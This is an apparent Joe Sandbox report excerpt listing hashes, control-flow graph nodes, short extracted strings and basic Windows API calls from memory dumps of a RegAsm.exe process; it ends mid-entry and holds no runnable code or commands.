                              • Snapshot File: hcaresult_2_2_6310000_RegAsm.jbxd
                              Similarity
                              • API ID:
                              • String ID: $
                              • API String ID: 0-3993045852
                              • Opcode ID: 8540e2eb479ef4f21f256cf40cac2879311d6956280bea0685dada5408ae9195
                              • Instruction ID: c55a023d8bbe546bb65773ad58e3cea3d056655fa58eda08b6f55380cd1f3c0c
                              • Opcode Fuzzy Hash: 8540e2eb479ef4f21f256cf40cac2879311d6956280bea0685dada5408ae9195
                              • Instruction Fuzzy Hash: C022B071E002099FDB69DBA4C4946AEB7B2EF85324F24846AD449EF344DB31DC46CBD1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000002.00000002.2908418048.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_6310000_RegAsm.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: fe035a2d921985b7759bb2cf4bcea83133a9a225f8f48e93fbd97630d13b0926
                              • Instruction ID: bd75953de00f321b7f308f0107b8e9e09aca8494d0a29b2db0db67bd6e7b17de
                              • Opcode Fuzzy Hash: fe035a2d921985b7759bb2cf4bcea83133a9a225f8f48e93fbd97630d13b0926
                              • Instruction Fuzzy Hash: A6923434A002048FDB68DB68C588A5EB7F2FB45314F5484A9D85AEF365DB35ED89CF80
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000002.00000002.2908418048.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_6310000_RegAsm.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 9520b92ceebf735cbf095b6fb22a16ea5a951342d05388a27bebc69cfc8208ff
                              • Instruction ID: 1afc27a02a0f6f21a7381379758ccdeec4cb29085f6327513205c7631395c876
                              • Opcode Fuzzy Hash: 9520b92ceebf735cbf095b6fb22a16ea5a951342d05388a27bebc69cfc8208ff
                              • Instruction Fuzzy Hash: B562A234B002048FDB58DBA8D594AADB7F2EF89314F248569E80ADF354DB35ED49CB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000002.00000002.2908418048.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_6310000_RegAsm.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 243d09a6df9816ae66eb842db52b674425ea0a3a2df0a72aab7aea77e9fe98e1
                              • Instruction ID: 3444f166e72c6718987e45d960a860c7a3a6ec1bae92fd337f38964836e8a228
                              • Opcode Fuzzy Hash: 243d09a6df9816ae66eb842db52b674425ea0a3a2df0a72aab7aea77e9fe98e1
                              • Instruction Fuzzy Hash: E332A434B402098FDB58DB68D880BADB7B2FB88310F14952AD506DF355DB79EC46CB91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000002.00000002.2908418048.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_6310000_RegAsm.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d5762953a79fc2615e7b6d3af6f909d4cdbd099868612843068321dfdb4d7107
                              • Instruction ID: bed275009f54adfa8dd201ac15971d7dafee852b71979aa59d93a626d9988839
                              • Opcode Fuzzy Hash: d5762953a79fc2615e7b6d3af6f909d4cdbd099868612843068321dfdb4d7107
                              • Instruction Fuzzy Hash: 8C225630E102098FEF68DB68D5907ADF7B2EB49310F24892AE446DF355DA35DC89CB91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000002.00000002.2902789579.0000000002820000.00000040.00000800.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_2820000_RegAsm.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b8a50a018f4c964652de5d95e6b7eae7a9096830f6d70ce2da45bce21ffb8012
                              • Instruction ID: ef9ef09dbe7fb69dea52ae51430bb73b443d339901bb39feba68a7470473fc51
                              • Opcode Fuzzy Hash: b8a50a018f4c964652de5d95e6b7eae7a9096830f6d70ce2da45bce21ffb8012
                              • Instruction Fuzzy Hash: DEB15178E002198FDF10CFA9D89179DBBF2EF48318F149529D819E7254EB749889CFA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000002.00000002.2902789579.0000000002820000.00000040.00000800.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_2820000_RegAsm.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 4803e7642d57fb4ceac6e7ac588fee3981000146e58a6e62bf7ba0366bfd2aeb
                              • Instruction ID: 1f207577fd9f046ebd3f1552327d07df424017d76d5238dca0e268a5f56bc880
                              • Opcode Fuzzy Hash: 4803e7642d57fb4ceac6e7ac588fee3981000146e58a6e62bf7ba0366bfd2aeb
                              • Instruction Fuzzy Hash: DD916F78E00229DFDF10CFA9D99179DBBF2AF48308F148129E419E7254EB749889CF91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 0 631ad18-631ad36 2 631ad38-631ad3b 0->2 3 631ad3d-631ad59 2->3 4 631ad5e-631ad61 2->4 3->4 5 631ad71-631ad74 4->5 6 631ad63-631ad6c 4->6 8 631af35-631af3e 5->8 9 631ad7a-631ad7d 5->9 6->5 10 631add4-631addd 8->10 11 631af44-631af4e 8->11 12 631ad7f-631ad83 9->12 13 631ad8e-631ad91 9->13 18 631ade3-631ade7 10->18 19 631af4f-631af61 10->19 12->11 14 631ad89 12->14 15 631ad93-631ad98 13->15 16 631ad9b-631ad9e 13->16 14->13 15->16 20 631ada0-631adad 16->20 21 631adb2-631adb5 16->21 22 631adec-631adee 18->22 30 631af63-631af86 19->30 31 631af8c-631af95 19->31 20->21 23 631adb7-631adca 21->23 24 631adcf-631add2 21->24 26 631adf0 22->26 27 631adf5-631adf8 22->27 23->24 24->10 24->22 26->27 27->2 28 631adfe-631ae22 27->28 44 631af32 28->44 45 631ae28-631ae37 28->45 33 631af88-631af8b 30->33 36 631af9a-631af9d 31->36 33->36 37 631af8d 33->37 38 631afc0-631afc3 36->38 39 631af9f-631afbb 36->39 41 631af93-631af95 37->41 42 631afd0-631afd3 38->42 43 631afc5-631afcf 38->43 39->38 41->36 47 631afe0-631afe3 42->47 48 631afd5-631afd9 42->48 44->8 57 631ae39-631ae3f 45->57 58 631ae4f-631ae8a call 63165d8 45->58 49 631afe9-631b024 47->49 51 631b24c-631b24e 47->51 48->49 50 631afdb 48->50 60 631b217-631b22a 49->60 61 631b02a-631b036 49->61 50->47 52 631b250 51->52 53 631b255-631b258 51->53 52->53 53->33 56 631b25e-631b268 53->56 62 631ae41 57->62 63 631ae43-631ae45 57->63 77 631aea2-631aeb9 58->77 78 631ae8c-631ae92 58->78 64 631b22c 60->64 68 631b056-631b09a 61->68 69 631b038-631b051 61->69 62->58 63->58 64->51 85 631b0b6-631b0f5 68->85 86 631b09c-631b0ae 68->86 69->64 87 631aed1-631aee2 77->87 88 631aebb-631aec1 77->88 79 631ae94 78->79 80 631ae96-631ae98 78->80 79->77 80->77 94 631b0fb-631b1d6 call 63165d8 85->94 95 631b1dc-631b1f1 85->95 86->85 98 631aee4-631aeea 87->98 99 631aefa-631af2b 87->99 90 631aec3 88->90 91 631aec5-631aec7 88->91 90->87 91->87 94->95 95->60 100 631aeec 98->100 101 631aeee-631aef0 98->101 99->44 100->99 101->99
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.2908418048.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_6310000_RegAsm.jbxd
                              Similarity
                              • API ID:
                              • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                              • API String ID: 0-3823777903
                              • Opcode ID: e3cbf5fa35713fb295c5d3905bb6285c56c55f079830bdf1a8942694829f60c8
                              • Instruction ID: 0b8fbb29263a1eedebabc372ef0b9e8dad4367bd5d2b2ab4599c2d4226e42a82
                              • Opcode Fuzzy Hash: e3cbf5fa35713fb295c5d3905bb6285c56c55f079830bdf1a8942694829f60c8
                              • Instruction Fuzzy Hash: B5E17F30E1120A8FDB69DFA8D8546AEB7F2EF85301F208529D40ADF354DB31D84ACB91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 255 631b6a0-631b6c2 256 631b6c4-631b6c7 255->256 257 631b6c9-631b6cd 256->257 258 631b6ee-631b6f1 256->258 261 631ba41-631ba76 257->261 262 631b6d3-631b6e3 257->262 259 631b6f3-631b6f9 258->259 260 631b70b-631b70e 258->260 259->261 263 631b6ff-631b706 259->263 264 631b710-631b716 260->264 265 631b728-631b72b 260->265 271 631ba78-631ba7b 261->271 274 631b9e7-631b9e8 262->274 275 631b6e9 262->275 263->260 264->261 266 631b71c-631b723 264->266 268 631b733-631b736 265->268 269 631b72d-631b72e 265->269 266->265 272 631b746-631b749 268->272 273 631b738-631b741 268->273 269->268 277 631ba7d-631ba99 271->277 278 631ba9e-631baa1 271->278 279 631b760-631b763 272->279 280 631b74b-631b74f 272->280 273->272 276 631b9ed-631b9f0 274->276 275->258 276->274 281 631b9f2-631b9f5 276->281 277->278 283 631baa7-631bacf 278->283 284 631bd0d-631bd0f 278->284 279->274 285 631b769-631b76c 279->285 280->261 282 631b755-631b75b 280->282 286 631b9f7-631b9fe 281->286 287 631ba09-631ba0c 281->287 282->279 329 631bad1-631bad4 283->329 330 631bad9-631bb1d 283->330 289 631bd11 284->289 290 631bd16-631bd19 284->290 291 631b7aa-631b7ad 285->291 292 631b76e-631b783 285->292 295 631b8a5-631b8ae 286->295 296 631ba04 286->296 287->274 297 631ba0e-631ba11 287->297 289->290 290->271 298 631bd1f-631bd28 290->298 293 631b7ba-631b7bd 291->293 294 631b7af-631b7b5 291->294 292->261 308 631b789-631b7a5 292->308 302 631b7e0-631b7e3 293->302 303 631b7bf-631b7db 293->303 294->293 301 631b8b3-631b8b6 295->301 296->287 305 631ba13-631ba1f 297->305 306 631ba24-631ba26 297->306 309 631b8c6-631b8c9 301->309 310 631b8b8-631b8c1 301->310 311 631b7f0-631b7f3 302->311 312 631b7e5-631b7eb 302->312 303->302 305->306 313 631ba28 306->313 314 631ba2d-631ba30 306->314 308->291 316 631b8d0-631b8d3 309->316 317 631b8cb-631b8cd 309->317 310->309 320 631b803-631b806 311->320 321 631b7f5-631b7fe 311->321 312->311 313->314 314->256 315 631ba36-631ba40 314->315 326 631b8d5-631b8d7 316->326 327 631b8da-631b8dd 316->327 317->316 322 631b819-631b81c 320->322 323 631b808-631b80e 320->323 321->320 331 631b843-631b846 322->331 332 631b81e-631b822 322->332 323->264 328 631b814 323->328 326->327 334 631b8ff-631b902 327->334 335 631b8df-631b8fa 327->335 328->322 329->298 370 631bb23-631bb2c 330->370 371 631bd02-631bd0c 330->371 339 631b885-631b888 331->339 340 631b848-631b85d 331->340 332->261 338 631b828-631b838 332->338 336 631b904-631b908 334->336 337 631b929-631b92c 334->337 335->334 336->261 343 631b90e-631b91e 336->343 337->323 345 631b932-631b935 337->345 338->257 356 631b83e 338->356 341 631b89b-631b89e 339->341 342 631b88a-631b890 339->342 340->261 357 631b863-631b880 340->357 341->342 348 631b8a0-631b8a3 341->348 342->259 347 631b896 342->347 343->332 362 631b924 343->362 350 631b947-631b94a 345->350 351 631b937 345->351 347->341 348->295 348->301 358 631b961-631b964 350->358 359 631b94c-631b950 350->359 363 631b93f-631b942 351->363 356->331 357->339 360 631b966-631b96a 358->360 361 631b97b-631b97e 358->361 359->261 364 631b956-631b95c 359->364 360->261 365 631b970-631b976 360->365 366 631b980-631b9dd call 63165d8 361->366 367 631b9e2-631b9e5 361->367 362->337 363->350 364->358 365->361 366->367 367->274 367->276 373 631bb32-631bb9e call 63165d8 370->373 374 631bcf8-631bcfd 370->374 388 631bba4-631bba9 373->388 389 631bc98-631bcad 373->389 374->371 392 631bbc5 388->392 393 631bbab-631bbb1 388->393 389->374 396 631bbc7-631bbcd 392->396 394 631bbb3-631bbb5 393->394 395 631bbb7-631bbb9 393->395 397 631bbc3 394->397 395->397 398 631bbe2-631bbef 396->398 399 631bbcf-631bbd5 396->399 397->396 406 631bbf1-631bbf7 398->406 407 631bc07-631bc14 398->407 400 631bc83-631bc92 399->400 401 631bbdb 399->401 400->388 400->389 401->398 402 631bc16-631bc23 401->402 403 631bc4a-631bc57 401->403 415 631bc25-631bc2b 402->415 416 631bc3b-631bc48 402->416 412 631bc59-631bc5f 403->412 413 631bc6f-631bc7c 403->413 408 631bbf9 406->408 409 631bbfb-631bbfd 406->409 407->400 408->407 409->407 417 631bc61 412->417 418 631bc63-631bc65 412->418 413->400 419 631bc2d 415->419 420 631bc2f-631bc31 415->420 416->400 417->413 418->413 419->416 420->416
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.2908418048.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_6310000_RegAsm.jbxd
                              Similarity
                              • API ID:
                              • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                              • API String ID: 0-2392861976
                              • Opcode ID: 0ed9109655e9a1e5c46665669eff76fc2fbe7bd63408ea1dc1bd1096945494fe
                              • Instruction ID: 755bd17531334e45b69ca24213e5916b6062c6d5feaafa856aba6d8a20edbecf
                              • Opcode Fuzzy Hash: 0ed9109655e9a1e5c46665669eff76fc2fbe7bd63408ea1dc1bd1096945494fe
                              • Instruction Fuzzy Hash: 05025D30E002098FDB68DFA8D584AADF7A6EF45310F24856AD406DF755DB31EC89CB91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 423 62f6e38-62f6ed7 GetCurrentProcess 428 62f6ed9-62f6edf 423->428 429 62f6ee0-62f6f14 GetCurrentThread 423->429 428->429 430 62f6f1d-62f6f51 GetCurrentProcess 429->430 431 62f6f16-62f6f1c 429->431 432 62f6f5a-62f6f75 call 62f7018 430->432 433 62f6f53-62f6f59 430->433 431->430 437 62f6f7b-62f6faa GetCurrentThreadId 432->437 433->432 438 62f6fac-62f6fb2 437->438 439 62f6fb3-62f7015 437->439 438->439
                              APIs
                              • GetCurrentProcess.KERNEL32 ref: 062F6EC6
                              • GetCurrentThread.KERNEL32 ref: 062F6F03
                              • GetCurrentProcess.KERNEL32 ref: 062F6F40
                              • GetCurrentThreadId.KERNEL32 ref: 062F6F99
                              Memory Dump Source
                              • Source File: 00000002.00000002.2908305637.00000000062F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062F0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_62f0000_RegAsm.jbxd
                              Similarity
                              • API ID: Current$ProcessThread
                              • String ID:
                              • API String ID: 2063062207-0
                              • Opcode ID: 42ca7043eea2b1b1c5339697f1fd80f675ed883e0af6e8cb32d597b9eb18df80
                              • Instruction ID: d888f23d1871e075952598005d6fa65eadb6e289e1890c9497469459d7292942
                              • Opcode Fuzzy Hash: 42ca7043eea2b1b1c5339697f1fd80f675ed883e0af6e8cb32d597b9eb18df80
                              • Instruction Fuzzy Hash: A45177B0D102498FEB54CFA9D948BAEFBF1EF48304F248469E459A7260DB349948CF65
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 446 62f6e48-62f6ed7 GetCurrentProcess 450 62f6ed9-62f6edf 446->450 451 62f6ee0-62f6f14 GetCurrentThread 446->451 450->451 452 62f6f1d-62f6f51 GetCurrentProcess 451->452 453 62f6f16-62f6f1c 451->453 454 62f6f5a-62f6f75 call 62f7018 452->454 455 62f6f53-62f6f59 452->455 453->452 459 62f6f7b-62f6faa GetCurrentThreadId 454->459 455->454 460 62f6fac-62f6fb2 459->460 461 62f6fb3-62f7015 459->461 460->461
                              APIs
                              • GetCurrentProcess.KERNEL32 ref: 062F6EC6
                              • GetCurrentThread.KERNEL32 ref: 062F6F03
                              • GetCurrentProcess.KERNEL32 ref: 062F6F40
                              • GetCurrentThreadId.KERNEL32 ref: 062F6F99
                              Memory Dump Source
                              • Source File: 00000002.00000002.2908305637.00000000062F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062F0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_62f0000_RegAsm.jbxd
                              Similarity
                              • API ID: Current$ProcessThread
                              • String ID:
                              • API String ID: 2063062207-0
                              • Opcode ID: 35cc759ca982774dda404f65618102395164a77b60fbbce89c1fc3e75c080378
                              • Instruction ID: 6186e6a7229363b729e43ad029e0fe2d1e172e65902346d3743b3ea8cc514c4f
                              • Opcode Fuzzy Hash: 35cc759ca982774dda404f65618102395164a77b60fbbce89c1fc3e75c080378
                              • Instruction Fuzzy Hash: 0A5168B4D102098FEB54DFA9D948BAEFBF1EF48314F208469D509A7360DB749848CF65
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 468 6319190-63191b5 469 63191b7-63191ba 468->469 470 63191c0-63191d5 469->470 471 6319a78-6319a7b 469->471 478 63191d7-63191dd 470->478 479 63191ed-6319203 470->479 472 6319aa1-6319aa3 471->472 473 6319a7d-6319a9c 471->473 475 6319aa5 472->475 476 6319aaa-6319aad 472->476 473->472 475->476 476->469 477 6319ab3-6319abd 476->477 481 63191e1-63191e3 478->481 482 63191df 478->482 485 631920e-6319210 479->485 481->479 482->479 486 6319212-6319218 485->486 487 6319228-6319299 485->487 488 631921a 486->488 489 631921c-631921e 486->489 498 63192c5-63192e1 487->498 499 631929b-63192be 487->499 488->487 489->487 504 63192e3-6319306 498->504 505 631930d-6319328 498->505 499->498 504->505 510 6319353-631936e 505->510 511 631932a-631934c 505->511 516 6319370-631938c 510->516 517 6319393-63193a1 510->517 511->510 516->517 518 63193b1-631942b 517->518 519 63193a3-63193ac 517->519 525 6319478-631948d 518->525 526 631942d-631944b 518->526 519->477 525->471 530 6319467-6319476 526->530 531 631944d-631945c 526->531 530->525 530->526 531->530
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.2908418048.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_6310000_RegAsm.jbxd
                              Similarity
                              • API ID:
                              • String ID: $^q$$^q$$^q$$^q
                              • API String ID: 0-2125118731
                              • Opcode ID: 813a51069f9adddd68a221eceec2eb6431374319a011b688dbb2fde96cf8e9b9
                              • Instruction ID: 9efd06710367f8fcd5aa55a3e7e93d75f64a923debbf6ffedd0bbd11599ef18b
                              • Opcode Fuzzy Hash: 813a51069f9adddd68a221eceec2eb6431374319a011b688dbb2fde96cf8e9b9
                              • Instruction Fuzzy Hash: BE910131F0021A9FDB58DB65D9507AEB3F6ABC9704F108569C409EF384EF709D868B91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 534 631cfa8-631cfc3 535 631cfc5-631cfc8 534->535 536 631d011-631d014 535->536 537 631cfca-631cfd9 535->537 540 631d023-631d026 536->540 541 631d016-631d018 536->541 538 631cfe8-631cff4 537->538 539 631cfdb-631cfe0 537->539 542 631d9c5-631d9fe 538->542 543 631cffa-631d00c 538->543 539->538 546 631d028-631d06a 540->546 547 631d06f-631d072 540->547 544 631d34f-631d358 541->544 545 631d01e 541->545 562 631da00-631da03 542->562 543->536 550 631d367-631d373 544->550 551 631d35a-631d35f 544->551 545->540 546->547 548 631d095-631d098 547->548 549 631d074-631d090 547->549 556 631d0e1-631d0e4 548->556 557 631d09a-631d0dc 548->557 549->548 553 631d484-631d489 550->553 554 631d379-631d38d 550->554 551->550 579 631d491 553->579 554->579 580 631d393-631d3a5 554->580 560 631d0e6-631d0f5 556->560 561 631d12d-631d130 556->561 557->556 566 631d104-631d110 560->566 567 631d0f7-631d0fc 560->567 563 631d132-631d174 561->563 564 631d179-631d17c 561->564 569 631da05-631da21 562->569 570 631da26-631da29 562->570 563->564 576 631d18b-631d18e 564->576 577 631d17e-631d180 564->577 566->542 578 631d116-631d128 566->578 567->566 569->570 573 631da2b-631da57 570->573 574 631da5c-631da5f 570->574 573->574 589 631da61 call 631db1d 574->589 590 631da6e-631da70 574->590 586 631d190-631d1d2 576->586 587 631d1d7-631d1da 576->587 577->579 584 631d186 577->584 578->561 583 631d494-631d4a0 579->583 598 631d3a7-631d3ad 580->598 599 631d3c9-631d3cb 580->599 583->537 593 631d4a6-631d793 583->593 584->576 586->587 594 631d1e4-631d1e7 587->594 595 631d1dc-631d1e1 587->595 605 631da67-631da69 589->605 591 631da72 590->591 592 631da77-631da7a 590->592 591->592 592->562 606 631da7c-631da8b 592->606 747 631d799-631d79f 593->747 748 631d9ba-631d9c4 593->748 607 631d230-631d233 594->607 608 631d1e9-631d22b 594->608 595->594 609 631d3b1-631d3bd 598->609 610 631d3af 598->610 616 631d3d5-631d3e1 599->616 605->590 626 631daf2-631db07 606->626 627 631da8d-631daf0 call 63165d8 606->627 607->583 611 631d239-631d23c 607->611 608->607 613 631d3bf-631d3c7 609->613 610->613 617 631d285-631d288 611->617 618 631d23e-631d280 611->618 613->616 639 631d3e3-631d3ed 616->639 640 631d3ef 616->640 624 631d2d1-631d2d4 617->624 625 631d28a-631d2cc 617->625 618->617 630 631d2d6-631d318 624->630 631 631d31d-631d320 624->631 625->624 652 631db08 626->652 627->626 630->631 641 631d322-631d338 631->641 642 631d33d-631d33f 631->642 650 631d3f4-631d3f6 639->650 640->650 641->642 653 631d341 642->653 654 631d346-631d349 642->654 650->579 657 631d3fc-631d418 call 63165d8 650->657 652->652 653->654 654->535 654->544 680 631d427-631d433 657->680 681 631d41a-631d41f 657->681 680->553 684 631d435-631d482 680->684 681->680 684->579 749 631d7a1-631d7a6 747->749 750 631d7ae-631d7b7 747->750 749->750 750->542 751 631d7bd-631d7d0 750->751 753 631d7d6-631d7dc 751->753 754 631d9aa-631d9b4 751->754 755 631d7eb-631d7f4 753->755 756 631d7de-631d7e3 753->756 754->747 754->748 755->542 757 631d7fa-631d81b 755->757 756->755 760 631d82a-631d833 757->760 761 631d81d-631d822 757->761 760->542 762 631d839-631d856 760->762 761->760 762->754 765 631d85c-631d862 762->765 765->542 766 631d868-631d881 765->766 768 631d887-631d8ae 766->768 769 631d99d-631d9a4 766->769 768->542 772 631d8b4-631d8be 768->772 769->754 769->765 772->542 773 631d8c4-631d8db 772->773 775 631d8ea-631d905 773->775 776 631d8dd-631d8e8 773->776 775->769 781 631d90b-631d924 call 63165d8 775->781 776->775 785 631d933-631d93c 781->785 786 631d926-631d92b 781->786 785->542 787 631d942-631d996 785->787 786->785 787->769
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.2908418048.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_6310000_RegAsm.jbxd
                              Similarity
                              • API ID:
                              • String ID: $^q$$^q$$^q
                              • API String ID: 0-831282457
                              • Opcode ID: bd54b4ef0affac9b7b356b5fe6f08ba2632b9d81c3678e4e5f07d1ec79942ad5
                              • Instruction ID: 6dac4e1f61794adf036513f71062a50cfd286e9d85bf4ad7b0564669493e48ca
                              • Opcode Fuzzy Hash: bd54b4ef0affac9b7b356b5fe6f08ba2632b9d81c3678e4e5f07d1ec79942ad5
                              • Instruction Fuzzy Hash: CC622F30A006098FDB59EF68D590A5EB7B2FF85304F248A69D0499F359DB71ED4ACB80
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 795 6314bb8-6314bdc 796 6314bde-6314be1 795->796 797 6314be3-6314bfd 796->797 798 6314c02-6314c05 796->798 797->798 799 63152e4-63152e6 798->799 800 6314c0b-6314d03 798->800 802 63152e8 799->802 803 63152ed-63152f0 799->803 818 6314d86-6314d8d 800->818 819 6314d09-6314d56 call 6315460 800->819 802->803 803->796 804 63152f6-6315303 803->804 820 6314e11-6314e1a 818->820 821 6314d93-6314e03 818->821 832 6314d5c-6314d78 819->832 820->804 838 6314e05 821->838 839 6314e0e 821->839 836 6314d83 832->836 837 6314d7a 832->837 836->818 837->836 838->839 839->820
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.2908418048.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_6310000_RegAsm.jbxd
                              Similarity
                              • API ID:
                              • String ID: fcq$XPcq$\Ocq
                              • API String ID: 0-3575482020
                              • Opcode ID: cb0a4419491aba9becf779bb0e5f750af59edcb164b12d8d619653762cca00cb
                              • Instruction ID: 0635c4f1878a934b2c13860e614fbcc4c5e25ed7bfbf9ddd33c969ec0fe6a4ef
                              • Opcode Fuzzy Hash: cb0a4419491aba9becf779bb0e5f750af59edcb164b12d8d619653762cca00cb
                              • Instruction Fuzzy Hash: 85615030F002189FEB549FA8C8547AEBAF7FF88700F208529D505AB395DE759C458F95
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1789 6319180-63191b5 1791 63191b7-63191ba 1789->1791 1792 63191c0-63191d5 1791->1792 1793 6319a78-6319a7b 1791->1793 1800 63191d7-63191dd 1792->1800 1801 63191ed-6319203 1792->1801 1794 6319aa1-6319aa3 1793->1794 1795 6319a7d-6319a9c 1793->1795 1797 6319aa5 1794->1797 1798 6319aaa-6319aad 1794->1798 1795->1794 1797->1798 1798->1791 1799 6319ab3-6319abd 1798->1799 1803 63191e1-63191e3 1800->1803 1804 63191df 1800->1804 1807 631920e-6319210 1801->1807 1803->1801 1804->1801 1808 6319212-6319218 1807->1808 1809 6319228-6319299 1807->1809 1810 631921a 1808->1810 1811 631921c-631921e 1808->1811 1820 63192c5-63192e1 1809->1820 1821 631929b-63192be 1809->1821 1810->1809 1811->1809 1826 63192e3-6319306 1820->1826 1827 631930d-6319328 1820->1827 1821->1820 1826->1827 1832 6319353-631936e 1827->1832 1833 631932a-631934c 1827->1833 1838 6319370-631938c 1832->1838 1839 6319393-63193a1 1832->1839 1833->1832 1838->1839 1840 63193b1-631942b 1839->1840 1841 63193a3-63193ac 1839->1841 1847 6319478-631948d 1840->1847 1848 631942d-631944b 1840->1848 1841->1799 1847->1793 1852 6319467-6319476 1848->1852 1853 631944d-631945c 1848->1853 1852->1847 1852->1848 1853->1852
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.2908418048.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_6310000_RegAsm.jbxd
                              Similarity
                              • API ID:
                              • String ID: $^q$$^q
                              • API String ID: 0-355816377
                              • Opcode ID: ae13763931a47bef76fd5ed1258fae48bc54c4c2eb8d8725dcda63c7f445a56b
                              • Instruction ID: dfd666fd0a2b83dcd561703448d4cb928a4a25e3e52e5bc99871758c34115afd
                              • Opcode Fuzzy Hash: ae13763931a47bef76fd5ed1258fae48bc54c4c2eb8d8725dcda63c7f445a56b
                              • Instruction Fuzzy Hash: 3D513130B041059FEB54DB79D960BAEB3F6ABC8744F14846AC40ADF384EA70DC46CB91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1856 6314ba8-6314bdc 1858 6314bde-6314be1 1856->1858 1859 6314be3-6314bfd 1858->1859 1860 6314c02-6314c05 1858->1860 1859->1860 1861 63152e4-63152e6 1860->1861 1862 6314c0b-6314d03 1860->1862 1864 63152e8 1861->1864 1865 63152ed-63152f0 1861->1865 1880 6314d86-6314d8d 1862->1880 1881 6314d09-6314d56 call 6315460 1862->1881 1864->1865 1865->1858 1866 63152f6-6315303 1865->1866 1882 6314e11-6314e1a 1880->1882 1883 6314d93-6314e03 1880->1883 1894 6314d5c-6314d78 1881->1894 1882->1866 1900 6314e05 1883->1900 1901 6314e0e 1883->1901 1898 6314d83 1894->1898 1899 6314d7a 1894->1899 1898->1880 1899->1898 1900->1901 1901->1882
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.2908418048.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_6310000_RegAsm.jbxd
                              Similarity
                              • API ID:
                              • String ID: fcq$XPcq
                              • API String ID: 0-936005338
                              • Opcode ID: 614e5079dac032b12072e6ae5c751eb442883387598f04bc8e323a9bfe63cf0a
                              • Instruction ID: bb304a29a9dd998a9c05fdd5d3c668e4670fc441b8b057e907a650a1aaa377b0
